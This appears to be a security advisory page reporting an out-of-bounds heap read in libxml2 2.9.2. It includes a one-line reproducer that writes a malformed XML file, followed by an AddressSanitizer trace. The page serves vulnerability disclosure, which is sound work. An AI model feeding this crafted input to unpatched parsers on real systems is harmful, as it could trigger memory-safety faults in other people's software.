libxml2 Out of bounds memory access

2015.10.23

Credit: Michal Zalewski

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2015-7941 | CVE-2015-7942

CWE: N/A

Hey,

There appears to be an out-of-bounds read in libxml2 (2.9.2). This normally won't cause a crash, but is visible under ASAN or Valgrind. One way to repro would be:

$ printf '<!DOCTYPEd[<!ENTITYnSt""><!ENTITY %%nNt"<!ELEMENT<![INCLUDE0"<!ENTITYL%%N;' >test.xml
$ ./xmllint_asan test.xml

Copy of the test case:
http://lcamtuf.coredump.cx/afl/demo/libxml2_oob.xml

==17901==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ea56 at pc 0x46cfc5 bp 0x7fffffffc420 sp 0x7fffffffc400
READ of size 1 at 0x60300000ea56 thread T0
    #0 0x46cfc4 in xmlParseConditionalSections (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x46cfc4)
    #1 0x46d7b3 in xmlParseMarkupDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x46d7b3)
    #2 0x4772a3 in xmlParseInternalSubset (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4772a3)
    #3 0x48e9b1 in xmlParseDocument (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x48e9b1)
    #4 0x4abe06 in xmlDoRead (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4abe06)
    #5 0x4ac022 in xmlReadFile (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4ac022)
    #6 0x40aa34 in parseAndPrintFile (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x40aa34)
    #7 0x411f43 in main (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x411f43)
    #8 0x7ffff61fcaf4 in __libc_start_main (/lib64/libc.so.6+0x21af4)
    #9 0x402f08 (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x402f08)

0x60300000ea56 is located 1 bytes to the right of 21-byte region [0x60300000ea40,0x60300000ea55)
allocated by thread T0 here:
    #0 0x7ffff6f4a6a8 in __interceptor_malloc (/usr/local/lib64/libasan.so.1+0x6d6a8)
    #1 0x5f6d98 in xmlStrndup (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x5f6d98)
    #2 0x412e50 in xmlCreateEntity (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x412e50)
    #3 0x41320a in xmlAddEntity (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x41320a)
    #4 0x41373a in xmlAddDocEntity (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x41373a)
    #5 0x725290 in xmlSAX2EntityDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x725290)
    #6 0x45ae8f in xmlParseEntityDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x45ae8f)
    #7 0x46d437 in xmlParseMarkupDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x46d437)
    #8 0x4772a3 in xmlParseInternalSubset (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4772a3)
    #9 0x48e9b1 in xmlParseDocument (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x48e9b1)
    #10 0x4abe06 in xmlDoRead (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4abe06)
    #11 0x4ac022 in xmlReadFile (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4ac022)
    #12 0x40aa34 in parseAndPrintFile (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x40aa34)
    #13 0x411f43 in main (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x411f43)
    #14 0x7ffff61fcaf4 in __libc_start_main (/lib64/libc.so.6+0x21af4)
Comment 1

References:

https://bugzilla.gnome.org/show_bug.cgi?id=744980

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

libxml2 Out of bounds memory access

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.